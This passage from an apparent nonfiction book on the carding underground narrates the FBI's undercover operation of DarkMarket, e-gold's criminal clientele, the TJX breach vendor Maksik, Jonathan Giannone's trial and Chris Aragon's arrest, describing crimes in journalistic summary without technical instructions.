Digits. +Four days after the USA Today article, the agents +exploited that knowledge by having a second snitch make a +controlled buy from Digits: twenty-three dumps for $480 in +e-gold. +It was more than they needed for a felony charge. + +29 + +One Plat and Six Classics +eith Mularski hadn’t known what he was in for when he +took over DarkMarket. +His days were crazy now. He’d start at eight in the +morning, logging in to his undercover computer at the office +and checking for overnight ICQ messages—any urgent +business for Master Splyntr. Then he’d hit DarkMarket and +make sure it was up and running. It was always hit-or-miss +with Iceman on the loose. +Next came the drudgery of backing up the SQL +database. Iceman had somehow dropped the tables twice +since his failed attempt to expose Mularski, so now the +backups were a part of Mularski’s morning routine. They +served an investigative function as well: While the database +was being copied, a simple script authored by an NCFTA +coder scanned every line for sixteen-digit numbers +beginning with the numerals 3 through 6. The stolen credit +card numbers would be automatically sorted by BIN and +sent to the proper banks for immediate cancellation. +Next, Mularski had to review all the private messages, +pick out the interesting chats, and check them into the FBI’s +central ELSUR electronic surveillance database. An hour or +two of report writing followed. As Master Splyntr, Mularski +had begun his own modest cash-out operation. Some +banks had agreed to issue him disposable dumps as bait, +with fake names but real lines of credit that the FBI would +cover out of its investigative budget. Mularski handed them +out with PINs to carders around the country, while the +financial institutions reported back daily on where and when +each withdrawal took place. Mularski had to pass the + +information to the local agents in whatever city his cashers +were operating from, which meant writing up a detailed +memo each time. +At three, when the carders came online in force, +Mularski’s second life shifted into high gear. Everyone +wanted something from Master Splyntr. There were +disputes to settle, like a dumps vendor complaining that his +ad wasn’t displayed as prominently as a competitor’s, or a +vendor facing accusations of ripping off a customer. +Beggars approached him asking for free dumps or +spamming services. +Mularski went home at the end of the day, only to log on +again. Keeping his credibility as Master Splyntr meant he +had to work the same hours as a real carder, so every night +saw Mularski on the sofa at home, the television turned to +whatever was on, his laptop open and online. He was on +DarkMarket, and AIM, and ICQ, answering questions, +assigning reviewers, approving vendors, and banning +rippers. He stayed online and in character until two in the +morning, nearly every day, dealing with the underground. +To ingratiate himself to his primary targets, he’d give +them gifts or sell them discounted merchandise, +supposedly purchased with stolen credit cards but actually +paid for by the bureau. Cha0, a Turkish crime boss and +DarkMarket admin, coveted an $800 lightweight PC sold in +the States, so Mularski shipped two of them off to Cha0’s +drop address in Turkey. Playing Santa Claus was in his job +description now: He had to appear to be running ops and +making money, and he sure as hell wasn’t going to spam +anyone. +Being a cybercrime boss, he was discovering, was hard +work. +When he traveled or vacationed, he had to let the forum +know in advance—even a brief unexplained absence would +invite suspicion that he’d been busted and turned. In +January 2007, he let the board know that he’d be on a +plane for a while. He didn’t say where or why. He was going + +plane for a while. He didn’t say where or why. He was going +to Germany to talk with prosecutors about DarkMarket’s +cofounder Matrix001. +Among other things, Matrix001 was DarkMarket’s +resident artist par excellence. He created and sold +Photoshop templates used by forgers to produce credit +cards or fake ID. He had them all: Visa, MasterCard, +American Express, Discover, the U.S. Social Security card, +notary seals, and driver’s licenses for several states. His +template for an American passport sold for $45. A Bank +One Visa was $125. +Matrix001 and Master Splyntr had grown tight since the +attempted exposé three months earlier: Mularski and the +German both liked video games, and they chatted about +the latest titles well into the night. They talked business, too, +and Matrix001 had confided that he received wire transfers +for some of his sales in the town of Eislingen in southern +Germany. That was the first clue to tracking him down. +From there, it was a matter of following the money. Like +virtually all carders, Matrix preferred to be paid by e-gold, +an electronic payment system created by a former Florida +oncologist named Douglas Jackson in 1996. A competitor +to PayPal, e-gold was the first virtual currency backed by +deposits of actual gold and silver bullion held in bank vaults +in London and Dubai. +It had been Jackson’s dream to forge a true international +monetary system independent of any government. +Criminals loved it. Unlike a real bank, e-gold took no +measures to verify the identity of its users—account holders +included “Mickey Mouse” and “No Name.” To get money in +or out of e-gold, users availed themselves of any of +hundreds of independent e-gold exchangers around the +world, businesses that would accept bank transfers, +anonymous money orders, or even cash in hand and +convert it to e-gold for a cut. Exchangers took another slice +when a user wanted to convert in the other direction, +changing the virtual money into the local currency or + +receiving it by Western Union, PayPal, or wire transfer. One +company even offered a preloaded ATM card—the “G- +Card”—that would let account holders withdraw their e-gold +from any cash machine. +By all evidence, criminals were e-gold’s bread and +butter. By December 2005, the company’s internal +investigations had identified more than three thousand +accounts involved in carding, another three thousand used +for buying and selling child porn, and thirteen thousand +accounts linked to various investment scams. They were +easy enough to spot: the “memo” field in child porn +transactions would read, for example, “Lolita”; in Ponzi +schemes, “HYIP,” for “high-yield investment program.” +Carders included shorthand descriptions of what they were +buying: “For 3 IDs”; “for dumps”; “10 classics”; “Fame’s +dumps”; “10 M/C”; “one plat and six classics”; “20 +vclassics”; “18 ssns”; “10 AZIDs”; “4 v classics”; “four +cvv2s”; “for 150 classics.” +For a long time, e-gold largely turned a blind eye to the +criminal trade; employees locked down some accounts +used by child porn sellers but didn’t stop them from +transferring out their money. But the company’s attitude +changed dramatically in December 2005, when FBI and +Secret Service agents executed a search warrant at e- +gold’s Melbourne, Florida, offices and accused Jackson of +running an unlicensed money transfer service. +Jackson began voluntarily searching his database for +signs of criminality and sending tips to the only agency that +wasn’t trying to put him in jail, the U.S. Postal Inspection +Service. His newfound commitment to law and order was a +boon to Mularski. Through Greg Crabb and his team at the +post office, Mularski asked Jackson for information about +Matrix001’s e-gold account, which was under the alias +“Ling Ching.” When Jackson looked in his database, he +found that the account had originally been set up under +another name: Markus Kellerer, with a street address in +Eislingen. In November, Mularski sent a formal request for + +Eislingen. In November, Mularski sent a formal request for +assistance to the German national police through the U.S. +consulate in Frankfurt. The police confirmed that Kellerer +was a real person and not just another alias, and Mularski +booked his flight to Stuttgart. +Matrix001 would be the first arrest from the DarkMarket +sting. Mularski would have to find someone else to chat +with about video games. +• • • +Once he was back in Pittsburgh, Mularski began working a +new, farfetched theory about Iceman. He’d been running +down every “Iceman” he could find—there’d been an +Iceman on Shadowcrew and others on IRC. They always +turned out to be red herrings. Now Mularski was toying with +the idea that his Iceman didn’t really exist. +It was Iceman’s supposed collaboration with the +Canadian informant Lloyd “Silo” Liske that intrigued him. +Silo had worked with Iceman to try to expose Mularski. +That, in itself, didn’t mean much—informants often call out +suspected cops and snitches to deflect suspicion from +themselves. But Silo had told his handler at the Vancouver +Police Department that he’d hacked Iceman’s computer, +yet when push came to shove, he couldn’t produce +Iceman’s real name or even a good Internet IP address. +And it turned out that Silo had dozens of e-gold accounts— +one of them under the name “Keyser Söze.” +If Liske was a fan of The Usual Suspects, it might occur +to him to create a phantom criminal mastermind and then +feed law enforcement false information about the supposed +kingpin in his role as an informant. +Mularski flew to Washington and presented his theory to +the Secret Service at their headquarters. It was shot down +at once. They were working closely with Silo’s handler at +the Vancouver Police Department, and they knew Silo as +one of the good guys. +The Secret Service had run down some false leads + +themselves. In a lab in the Pittsburgh field office, the agents +had a whiteboard scrawled with handles and names +connected by squiggles and lines. Many of the names were +crossed out. It was their ever-changing road map to Iceman +and his world. +Mularski returned to Pittsburgh, and both agencies +resumed their search for the real Keyser Söze of the +cyberworld—the elusive hacking kingpin Iceman. + +30 + +Maksik +ax could see what was coming. With an FBI agent at +the helm, DarkMarket was going to put a lot of carders in +prison. But like Cassandra from Greek mythology, he was +cursed to know the future and have nobody believe him. +Between the USA Today article and his failed attempt to +expose Master Splyntr, Max could feel the heat coming at +him. In November, he declared Iceman’s retirement and +made a show of handing control of the site to +Th3C0rrupted0ne. He secluded himself while things cooled +down and three weeks later took back the board under +another handle. Iceman was dead; long live “Aphex.” +Max was getting tired of the tight quarters at the Post +Street Towers, so Chris brought Nancy, one of his cashers, +up to San Francisco to rent Max a one-bedroom at +Archstone’s towering Fox Plaza corporate apartment +complex in the financial district. She posed as a sales +representative at Capital Solutions, a corporate front +Aragon used to launder some of his income. Tea, back +from her trip to Mongolia, was conscripted to sit in the +apartment and accept delivery of a bed, paid for with her +legitimate American Express card. Chris reimbursed her +afterward. +By January 2007, Max was back in business at his new +safe house, with a stew of Wi-Fi brewing outside. Fox +Plaza was a giant step up in luxury from the Post Street +Towers, but Max could afford it—he could pay a month’s +rent with a couple of good days of dumps vending. As +Digits, Max was now regarded by some carders as the +second-most-successful magstripe vendor in the world. + +The number one spot was firmly occupied by a Ukrainian +known as Maksik. Maksik operated outside the carding +forums, running his own Web-based dispensary for his +stolen cards at Maksik.cc. Buyers would begin by sending +Maksik upfront money by e-gold, WebMoney, wire transfer, +or Western Union. That would buy them access to his +website, where they could select the dumps they wanted by +BIN and type of card and place an order. On his end, +Maksik would press a button to approve the transaction, +and the buyer would get an e-mail with the dumps he’d +ordered, straight from Maksik’s massive database of +stolen cards. +Maksik’s wares were phenomenal, with a high success +rate at the register and a mammoth selection of BINs. Like +Max’s, Maksik’s cards came from swipes at point-of-sale +terminals. But instead of targeting scores of small stores +and restaurants, Maksik got his cards from a smaller +number of giant targets: Polo Ralph Lauren in 2004; Office +Max in 2005. In three months, Discount Shoe Warehouse +lost 1.4 million cards taken from 108 stores in 25 states— +straight into Maksik’s database. In July 2005, a record- +breaking 45.6 million dumps were stolen from the TJX- +owned retail chains T. J. Maxx, Marshalls, and +HomeGoods. +There was a time when such breaches might have +remained a secret between the hackers, the companies, +and federal law enforcement—with the victim consumers +kept in the dark. To encourage companies to report +breaches, some FBI agents had an unofficial policy of +keeping company names out of indictments and press +releases, protecting corporations from bad publicity over +their shoddy security. In the 1997 Carlos Salgado Jr. case +—the first large-scale online credit card heist—the +government persuaded the sentencing judge to +permanently seal the court transcripts, for fear the targeted +company would suffer “loss of business due to the +perception by others that computer systems may be + +perception by others that computer systems may be +vulnerable.” Consequently, the eighty thousand victims were +never notified that their names, addresses, and credit card +numbers had been offered for sale on IRC. +In 2003, the state of California effectively ended such +cover-ups when the legislature enacted SB1386, the +nation’s first compulsory breach-disclosure law. The law +requires hacked organizations doing business in the +Golden State to promptly warn potential identity theft +victims of a breach. In the years that followed, forty-five +other states passed similar legislation. Now no significant +breach of consumer data remains a secret for long, once +detected by the company and the banks. +The headlines over the giant retail breaches only added +luster to Maksik’s product—he didn’t try to hide the fact that +he was vending the dumps from the retail chains. When the +TJX attack made news in January 2007, the details that +emerged also confirmed what many carders already +suspected: the Ukrainian had a stateside hacker supplying +him with dumps. Maksik was a middleman for a mystery +hacker in the States. +In mid-2006, the hacker was apparently in Miami, where +he parked at two TJX-owned Marshalls outlets and cracked +the stores’ Wi-Fi encryption. From there, he hopped on the +local network and swam upstream to the corporate +headquarters, where he launched a packet sniffer to +capture credit card transactions live from the Marshalls, T. +J. Maxx, and HomeGoods stores around the country. The +sniffer, an investigation would later find, ran undetected for +seven months. +Max had a rival in America, and a damn good one. +Thanks in large part to Maksik’s hacker and Max Vision, +the popular consumer impression that Web transactions +were less secure than real-life purchases was now +completely false. In 2007, the majority of compromised +cards were stolen from brick-and-mortar retailers and +restaurants. The large retail intrusions were compromising + +millions of cards at a time, but breaches at smaller +merchants were far more common—Visa’s analysis found +83 percent of credit card breaches were at merchants +processing one million Visa transactions or less annually, +with the majority of thefts taking place at restaurants. +Max tried to keep the sources of his dumps a secret, +falsely claiming in his forum posts that the data came from +credit card processing centers to throw investigators off +track. But Visa knew that restaurant point-of-sale terminals +were being hit hard. In November 2006, the company +issued a bulletin to the food service industry warning about +hack attacks unfolding through VNC and other remote- +access software. Max, though, continued to find a steady +stream of vulnerable eateries. +But for Max, it wasn’t enough. He hadn’t gone into the +data-theft business to be second-best. Maksik was costing +him money. Even Chris was now buying from both Maksik +and Max, going with whichever vendor offered him a good +deal on the best dumps. +At Max’s direction, Tea befriended the Ukrainian over the +course of months and urged him to start vending on +Carders Market. Maksik declined graciously and +suggested she visit him sometime in Ukraine. Rebuffed, +Max took the gloves off and got Tea to send Maksik a +Trojan horse program, hoping to get control of the +Ukranian’s database of dumps. Maksik laughed off the +hacking attempt. +If he’d known, Max might have taken comfort in the fact +that he wasn’t the only one frustrated by Maksik’s tight +security. +Federal law enforcement had been tracking Maksik +since his rise to infamy in the wake of Operation Firewall. +An undercover Secret Service agent had been buying +dumps from him. Postal Inspector Greg Crabb had worked +with law enforcement in Europe to bust carders who’d done +business with Maksik, and he shared the resulting +information with the Ukrainian national police. In early 2006, + +information with the Ukrainian national police. In early 2006, +the Ukranians finally identified Maksik as one Maksym +Yastremski, from Kharkov. But they didn’t have enough +evidence to make an arrest. +The United States refocused on identifying Maksik’s +hacking source. E-gold once again provided the entry +point. The Secret Service analyzed Maksik’s accounts in +the e-gold database and found that between February and +May 2006, Maksik had transferred $410,750 out of his +account to “Segvec,” a Mazafaka dumps vendor generally +thought to be in Eastern Europe. An outward transfer +implied Segvec wasn’t one of Maksik’s customers but a +supplier getting his cut. +The feds got a chance at more direct information in June +2006, when Maksik was vacationing in Dubai. Secret +Service agents from San Diego worked with local police to +execute a “sneak-and-peek” in his room, where they +secretly copied his hard drive for analysis. But it was a +dead end. The sensitive material on the drive was all +encrypted with a program called Pretty Good Privacy. It +was good enough to stop the Secret Service in its tracks. +Carders like Maksik and Max were at the fore in embracing +one of the unheralded gifts of the computer revolution: +cryptography software so strong that, in theory, even the +NSA couldn’t crack it. +In the 1990s the Justice Department and Louis Freeh’s +FBI had tried hard to make such encryption illegal in the +United States, fearing that it would be embraced by +organized crime, pedophiles, terrorists, and hackers. It was +a doomed effort. American mathematicians had decades +before developed and published high-security encryption +algorithms that rivaled the government’s own classified +systems; the genie was out of the bottle. In 1991, a U.S. +programmer and activist named Phil Zimmerman had +released the free software Pretty Good Privacy, which was +available on the Web. + +But that didn’t stop law enforcement and intelligence +officials from trying. In 1993, the Clinton administration +began producing the so-called Clipper Chip, an NSA- +developed encryption chip intended for use in computers +and telephones and designed with a “key recovery” feature +that would allow the government to crack the crypto on +demand, with the proper legal authority. The chip was a +dismal failure in the marketplace, and the project was dead +by 1996. +Then lawmakers began swinging the opposite direction, +talking about repealing Cold War–era export regulations +that classified strong encryption as a “munition” generally +prohibited from export. The regulations were forcing +technology companies to keep strong crypto out of key +Internet software, weakening online security; meanwhile, +overseas companies weren’t bound by the laws and were +in position to overtake America in the encryption market. +The feds responded with a draconian counterproposal +that would have made it a five-year felony to sell any +encryption software in America that lacked a back door for +law enforcement and government spies. In testimony to a +House subcommittee in 1997, a Justice Department lawyer +warned that hackers would be a prime customer of legal +encryption and used the Carlos Salgado bust to illustrate +his point. Salgado had encrypted the CD-ROM containing +the eighty thousand stolen credit card numbers. The FBI +had only been able to access it because the hacker gave +his supposed buyer the key. +“We were lucky in this case, because Salgado’s +purchaser was cooperating with the FBI,” the official +testified. “But if we had discovered this case another way, +law enforcement could not have penetrated the information +on Salgado’s CD-ROM. Crimes like this one have serious +implications for law enforcement’s ability to protect +commercial data as well as personal privacy.” +But the feds lost the crypto wars, and by 2005 +unbreakable crypto was widely available to anyone who + +unbreakable crypto was widely available to anyone who +wanted it. The predictions of doom had largely failed to +materialize; most criminals weren’t tech-savvy enough to +adopt encryption. +Max, though, was. If all his tradecraft failed and the feds +crashed through his safe house door, they’d find everything +he accumulated in his crimes, from credit card numbers to +hacking code, scrambled with an Israeli-made encryption +program called DriveCrypt—1,344-bit military-grade crypto +he’d purchased for about $60. +The government would arrest him anyway, he expected, +and demand his passphrase. He would claim to have +forgotten it. A federal judge somewhere would order him to +disclose the secret key, and he’d refuse. He’d be held on +contempt charges for maybe a year and then be released. +Without his files, the government wouldn’t have any +evidence of his real crimes. +Nothing had been left to chance—Max was certain. He +was untouchable. + +31 + +The Trial +onathan Giannone, the Long Island carder Max and +Chris had discovered as a teenager, was keeping a secret +from everyone. +The same day Max had absorbed his competitors, +Secret Service agents had arrested Giannone at his +parents’ house for selling some of Max’s dumps to Brett +Johnson, the Secret Service informant known as Gollumfun. +Giannone was released on bail, but he told nobody about +the bust. To him, it was just a bump in the road—how much +trouble could he really get in for selling twenty-nine dumps? +The impression that he was facing a slap on the wrist +was bolstered when the judge in South Carolina lifted his +travel restrictions a month after his arrest. Giannone +promptly flew into Oakland Airport on a carding run, and +Tea picked him up and showed him around. They drove up +and down the Pacific Coast Highway, and she bought him +a pizza at Fat Slice on Berkeley’s Telegraph Avenue. +She’d always found Giannone amusing—a boastful, curly- +haired white kid with hip-hop sensibilities who’d once +bragged that he’d beat up a member of the New York Jets +at a local bar. Now, though, they had something in common: +Chris had stopped talking to Giannone around the time of +his arrest, while Tea, for her part, had been ordered to +return to the Bay Area so she couldn’t make any more +trouble with Chris’s relationships. Chris had exiled them +both. +Chris called Tea while they were hanging out and was +surprised to hear that Giannone was in town. He had her +put Giannone on the phone. “So, you take my girls out to + +party now?” he demanded, angry that Giannone was +forging a relationship with one of his people—perhaps +courting her for a cashing crew of his own. +“No, I just happen to be here and I looked her up,” +Giannone said a little defensively. +It would be Chris’s and Giannone’s last phone +conversation. Giannone flew home. He kept in touch with +Tea, and a few months later, he warned her that he might +not be a good person to be associating with. He was pretty +sure he’d been followed on his trip to the Bay Area. +“I got some heat on me right now,” Giannone said. +“What kind of heat?” Tea asked. Giannone liked to affect +an air of danger. +“I go to trial next week.” +Federal criminal trials are rare. Faced with the long prison +terms recommended by rigid sentencing guidelines, most +defendants opt to take a plea deal in exchange for a slightly +shortened sentence or limit their exposure by becoming an +informant. Some 87 percent of prosecutions were resolved +in this manner in 2006, the year of Giannone’s trial. In +another 9 percent of the cases, charges were dismissed +before reaching a trial, the government preferring to drop a +marginal case rather than risk a loss. Once a jury is seated, +a defendant’s chances for acquittal are about one in ten. +But Giannone liked his odds. Most cases don’t hinge on +the undercover work performed by an active computer +criminal. Soon after he’d snitched on Giannone, Brett +“Gollumfun” Johnson had gone on a four-month cross- +country crime spree, pulling his IRS scam in Texas, +Arizona, New Mexico, Las Vegas, California, and Florida, +where he was finally nabbed in Orlando with nearly +$200,000 stuffed in backpacks in his bedroom. He wouldn’t +make a very good witness for the prosecution. +The bailiff passed out pads and pencils to the twelve +jurors, and the prosecutor began his opening statement, + +adopting a down-home, country tone. +“I love the Internet,” he said. “The Internet is a fascinating +thing. It’s a place where we can entertain ourselves; we can +get information; we can watch videos; we can play games; +we can buy things. eBay is a great place, you can bid on +things. If you can think about it, you can buy it on eBay. +“But, ladies and gentlemen, there’s a side of the Internet +that we don’t like to think about. There’s kind of a dark +underbelly to the Internet, one where not trinkets or bobbles +are bought, sold, and traded. There’s a part of the Internet +where people’s lives are bought, sold, and traded.… +“You are going to see that side of the Internet. And I +suspect that you are never going to look at the Internet +exactly the same way again.” +The trial lasted three days. The prosecutor disposed of +Brett Johnson right out of the gate, acknowledging that +Gollumfun was a liar and a thief who’d betrayed the trust of +his Secret Service handlers. That was why the government +wasn’t calling him to testify. The prosecution’s “star +witness” would be the computer logs of Giannone’s chats +with the informant. The record would speak for itself. +Giannone’s lawyer did his best to attack the logs. +“Machines make mistakes.” He argued that because the +stolen credit cards were never fraudulently used, there were +no victims. He reminded the jurors that nobody died or +suffered physical harm. +After one day of deliberation, the verdict came in: guilty. +The first federal trial of the carding underground was over. +The judge ordered Giannone taken into custody. +A week later, Giannone was summoned from his cell at +the Lexington County Jail. He instantly recognized the +Secret Service agents waiting by the sally port, two steel +doors away from freedom; the two men had been +Johnson’s handlers, and they’d testified at Giannone’s trial. +“We want to know who this guy Iceman is,” one of them + +said. +“Who’s Iceman?” Giannone answered innocently. +The situation was serious, the agents said; they’d +learned that Iceman had threatened to kill the president. +Giannone asked for his lawyer, and the agents phoned him +on the spot. The attorney consented to an interview in the +hope of winning leniency for his client at sentencing. +In a series of meetings over the next three weeks, the +agents pulled Giannone out of jail again and again, shuttling +him to the same field office where Gollumfun had +orchestrated his downfall. Unlike most carders, Giannone +had held his mud at his arrest and taken a chance on a trial +instead of cutting a snitch deal. But now he was looking +down the barrel of a five-year sentence. He was only +twenty-one years old. +Giannone told them everything he knew: Iceman lived in +San Francisco, did a brisk business in dumps, sometimes +used the aliases Digits and Generous to sell his goods. He +used hacked Wi-Fi to cover his tracks. A Mongolian +woman called Tea was his Russian translator. +Most crucially, he had a partner named Christopher +Aragon in Orange County, California. You want Iceman? +Get Chris Aragon. +The revelations electrified the agents tracking Iceman. +When Keith Mularski typed Chris Aragon’s name into the +FBI’s case management system, he found Werner Janer’s +2006 proffer sessions, in which he’d named Chris’s dumps +supplier as a tall, ponytailed man he knew as “Max the +Hacker.” It got better. Way back in December 2005, Jeff +Norminton had been arrested for receiving Janer’s wire +transfer on behalf of Aragon. He’d told the FBI about +introducing Aragon to the superhacker Max Butler after his +release from Taft. The interviewing agent was only +interested in real estate fraud and hadn’t pursued the lead. +Now Mularski and his Secret Service counterparts had a + +name. Giannone’s statements confirmed it. Iceman had told +Giannone that he was once raided as a suspect in the Half- +Life 2 source-code theft. Mularski ran another search and +saw there were only two U.S. search warrants executed in +that investigation: one against Chris Toshok, and one +against Max Ray Butler. +Iceman’s identity had been hidden in the government’s +computers all along. Giannone had given them the +password to unlock it. +Knowing Iceman’s identity wasn’t the same as proving it, +though. The feds had enough for a search warrant, but they +didn’t have the location of Max’s safe house. Worse, +Giannone had tipped them that Iceman used DriveCrypt. +That meant that even if they tracked down Max’s address, +they couldn’t count on finding evidence on his hard drive. +They could bust down Max’s door, then watch him walk out +of a courtroom twenty-four hours later on bail or a signature +bond. With an international network of fake ID vendors and +identity thieves at his beck and call, Max might vanish, +never to be seen again. +They needed to sew up the case before making a move. +Mularski decided Chris Aragon was the key. Thanks to +Norminton, they knew all about the wire transfer and real +estate fraud scheme he’d profited from almost five years +earlier. If they could nail Aragon for that, they could press +him to cooperate against Max. +Unaware of the net tightening around him, Max continued +his round-the-clock management of Carders Market as +“Aphex.” Not that his new identity was really fooling anyone. +He couldn’t resist carrying Iceman’s campaign against +DarkMarket’s leaders into his new persona, calling them +“idiots and incompetents” and circulating the evidence he’d +gathered against Master Splyntr. He was astonished that +so many people didn’t believe him. “DarkMarket is founded +and run by NCFTA/FBI for Christ sake!” + +Th3C0rrupted0ne believed Max and gave up his status +on DarkMarket to work as a full-time admin on Max’s board +—he was devoting fourteen hours a day to the site now. But +Max didn’t trust him either. It was well-known that C0rrupted +lived in Pittsburgh, the home of the NCFTA. +Max had developed a new test function for possible +informants, and in March he’d tried it out on the carder, +announcing out of the blue that he was working with a +terrorist cell “and we should have a shot at killing President +Bush this coming weekend.” If C0rrupted was a fed, he’d +be obliged to discourage the notional assassination plot, +Max figured, or he’d ask for more details. +C0rrupted’s response briefly assuaged Max’s doubts. +“Good luck with the president thing. Make sure you get the +vice president as well. He is no better.” +There was a lot of work to do on the board. Carders +Market was hopping, with over a dozen specialized +vendors: DataCorporation, Bolor, Tsar Boris, Perl, and +RevenantShadow sold credit card numbers with CVV2s, +stolen variously from the United States, UK, and Canada; +Yevin vended California driver’s licenses; Notepad would +check the validity of dumps for a small fee; Snake Solid +moved U.S. and Canadian dumps; Voroshilov offered +identity thieves a service that could obtain a victim’s Social +Security number and date of birth; DelusionNFX vended +hacked online banking logins; Illusionist was Carders +Market’s answer to JiLsi, selling novelty templates and +credit card images; Imagine competed with EasyLivin’ in +the plastics trade. +Max tried to run a tight ship—a “military base,” one +carder critic groused. As in his white-hat days, he prized +intellectual honesty, refusing to grant special favor to even +his closest allies. +In April, C0rrupted prepared a review of Chris’s latest +generation of “novelty” IDs and plastics. He found them +wanting—for one thing, the signature strips were printed +right on the cards; you had to sign them with a felt-tip. He + +right on the cards; you had to sign them with a felt-tip. He +thought the products were worth five stars out of ten, but he +asked Max if he should fluff his findings a little. “I know you +and Easylivin’ are close, so I wanted to know if I should post +a true opinion review about these things that I felt, or if I +should not be so harsh?” +“I think definitely post the truth, and if possible back it up +with pics etc.,” Max wrote back. “I am tight with Easylivin’, +but I think the truth is more important. Besides, if he is +covered for, and continues to ship poor quality (damn … it’s +really that bad?) then it will reflect badly on you and Carders +Market.” +A bad review would cost Chris money. But Max didn’t +hesitate when it came to the integrity of his crime site. + +32 + +The Mall +hris pulled his Tahoe into the garage at Fashion Island +Mall in Newport Beach, parked, and got out with his new +partner, twenty-three-year-old Guy Shitrit. They walked +toward the Bloomingdale’s, fake American Express cards +in their wallets. +Originally from Israel, Shitrit was a handsome guitar +player and ladies’ man whom Chris had met on Carders +Market. Shitrit had been running a skimming operation in +Miami, recruiting professional strippers at work and +equipping them with exceedingly small skimming devices +to steal patrons’ magstripe data. When the strip-club +managers found out, Shitrit had to get out of town in a hurry. +He’d landed in Orange County, where Chris hooked him up +with a fake ID, a rental car, and an apartment at the +Archstone. Then they hit the stores. +Chris was close now, so close, to getting out. His wife, +Clara, had brought in $780,000 on eBay in a little over +three years: 2,609 Coach bags, iPods, Michele watches, +and Juicy Couture clothes. She had an employee working +twenty hours a week just shipping the ill-gotten +merchandise. Chris added to the take with his sales of +plastics and novelties on Carders Market, an enterprise +that wasn’t helped by Th3C0rrupted0ne’s nitpicking review. +Max, he felt, was ignoring the Whiz List, their blueprint for +building one big score and getting out. Chris had finally +figured it out: Max didn’t want to quit. He liked hacking; it +was all he wanted to do. So screw him. Chris had his own +exit strategy in place. He’d poured his profits into an +enterprise for Clara, a denim fashion company called + +Trendsetter USA that already employed several full-time +workers at a bright, pleasant office in Aliso Viejo. +Eventually, he was certain, it would be profitable. And 100 +percent legit. +Until then, he’d be busy. +Shitrit was a clotheshorse, and they’d already +squandered some of their stolen credit on men’s clothing +for him. On this visit, they’d stay focused. They walked into +the air-conditioned coolness of the Bloomingdale’s and +made a beeline for Ladies’ Handbags. The Coach purses +rested on small shelves along one wall, individually spotlit +like museum exhibits. Chris and Guy each picked some out +and went to the register. After some swipes at the point-of- +sale terminal, they were headed for the door with $13,000 +worth of Coach in their hands. +Chris was breaking his own rules by going in-store +himself, but his crew was suddenly thinning. Nancy, who’d +helped set up Max’s new safe house, had since moved to +Atlanta and was doing only a little cashing there. Liz was +becoming paranoid—she was constantly accusing Chris of +ripping her off, conveying her displeasure in meticulous, +hand-drawn spreadsheets summing up how much Chris +owed her for each in-store appearance: $1,918 from a trip +to Vegas; $674 for iPods and GPS systems; $525 for four +Coach purses worth $1,750. The “amount paid to me” +column was zeroes all the way down. In the meantime, his +newest recruit, Sarah, was balking at big-ticket items, +though she was still useful for running errands. On +Valentine’s Day she bought Chris’s presents for his wife +and his girlfriend. +With the demands of vending, starting a legitimate +business, and trying to resuscitate his crew, Chris now +found it more efficient to pay someone else to make his +plastic. He’d met Federico Vigo at UBuyWeRush. Vigo +was looking for a way to pay down a $100,000 debt to the +Mexican Mafia, after accepting that amount in front money +to import a pallet of ephedra from China, only to have the + +to import a pallet of ephedra from China, only to have the +product intercepted at the border. Chris put him to work. +The counterfeiting gear was moved from the Tea House to +Vigo’s office in Northridge, and one of Chris’s gophers was +running out to the Valley a couple of times a week to collect +the latest batch of credit cards hot off the presses, paying +Vigo $10 for each card. +Chris and Guy left the Bloomingdale’s and kept their +unhurried pace back to the SUV. Chris popped the back +and found a place for the new purchases amid a dozen +plain brown department store bags already jostling for +space, each filled with purses, watches, and a smattering +of men’s clothing. He closed up; they got into the car and +started planning their next stop. +They were still planning when a white police cruiser +zoomed into the garage. It stopped near them and +disgorged two uniformed Newport Beach Police +Department officers. +Chris’s heart sank. Another bust. +The police booked Chris at the Newport Beach Police +Station just down the road from the mall, then searched his +car, turning up seventy credit cards and small amounts of +Ecstasy and Xanax. Once he was fingerprinted, Chris was +ushered into an interrogation room, where Detective Bob +Watts handed him a Miranda waiver. +Chris signed and launched into the same basic story that +had gotten him out of serious trouble in San Francisco a +few years earlier. He promptly admitted his real name and +confessed with evident shame to using counterfeit credit +cards at Bloomingdale’s and elsewhere. It was the +economy, he said. He’d worked in the mortgage industry +and was hit hard when the real estate market collapsed. +That’s when the head of an Orange County carding ring +recruited him to card merchandise for a small percentage +of the profits. He was just a mule. +It was a familiar tale to Watts, who’d busted low-level + +cashers before. It even explained Aragon’s amateurish +Bloomingdale’s run—gobbling up thousands of dollars’ +worth of Coach bags at once. Bloomingdale’s security +people didn’t like to upset the store’s customers, so when +they had a suspicious one, they normally called Watts or his +partner, who’d arrange for a discreet traffic stop on a +“vehicle code violation” to check out the suspect away from +the store. If the shopper was innocent, they’d never know +that Bloomingdale’s had called the cops on them. Chris’s +and Shitrit’s behavior, though, was so blatant that the store +had no worries that they might be innocent. The security +team called the police dispatch desk directly to make sure +the men didn’t get out of the parking lot. +But Watts wasn’t buying Chris Aragon’s hard-luck story. +He’d been a detective for only eight months but a cop for +seven years; the first thing he’d done when Aragon came in +was run him through NCIC. He’d seen that Chris’s criminal +record stretched back to the seventies, and technically, he +was still on probation from his most recent bust in San +Francisco—for credit card fraud. +He figured he had a ringleader in his holding cell. He got +a search warrant in a hurry and converged with a team of +detectives and uniformed cops at the only address he could +find for Chris: Trendsetter USA. One look at the baffled +faces of the employees as the cops stormed the door told +Watts they were innocent. After some questioning, one of +the workers mentioned that their boss, Clara, ran an eBay +business in the back office. +Watts opened the storage cabinets in back and took +inventory: thirty-one Coach bags, twelve new Canon +PowerShot digital cameras, several TomTom GPS +navigators, Chanel sunglasses, Palm organizers, and +iPods, all new in the box. +Clara walked into the office in the middle of the search +and was promptly arrested. In her purse, Watts found +several utility bills for an address in Capistrano Beach, all in +different names. Clara reluctantly admitted she lived there; + +different names. Clara reluctantly admitted she lived there; +her face fell when Watts told her it was his next stop. +With Clara’s house keys and a new search warrant in +hand, the detectives arrived at the Aragon home and began +their search. In Chris’s home office, they found an unlocked +safe in the closet. Inside were two plastic index-card cases +crammed with counterfeit cards. There were more cards in +the bedroom, bundled in rubber bands and stashed in the +night table. An MSR206 rested on a shelf in the family +room, and in the connecting garage, a box of purses sat on +the floor next to the fitness machine. +Aside from the dining room and bathrooms, the only +space in the house clean of evidence was the boys’ +comfortable bedroom. Just two twin beds, side by side, +some stuffed animals and toys. +For all his talk about credit card fraud as a victimless +crime, Chris had overlooked the two most vulnerable +victims of his conduct. They were four and seven, and their +dad wasn’t coming home. + +33 + +Exit Strategy +hat’s a fed,” Max said, indicating a sedan passing +them on the street. 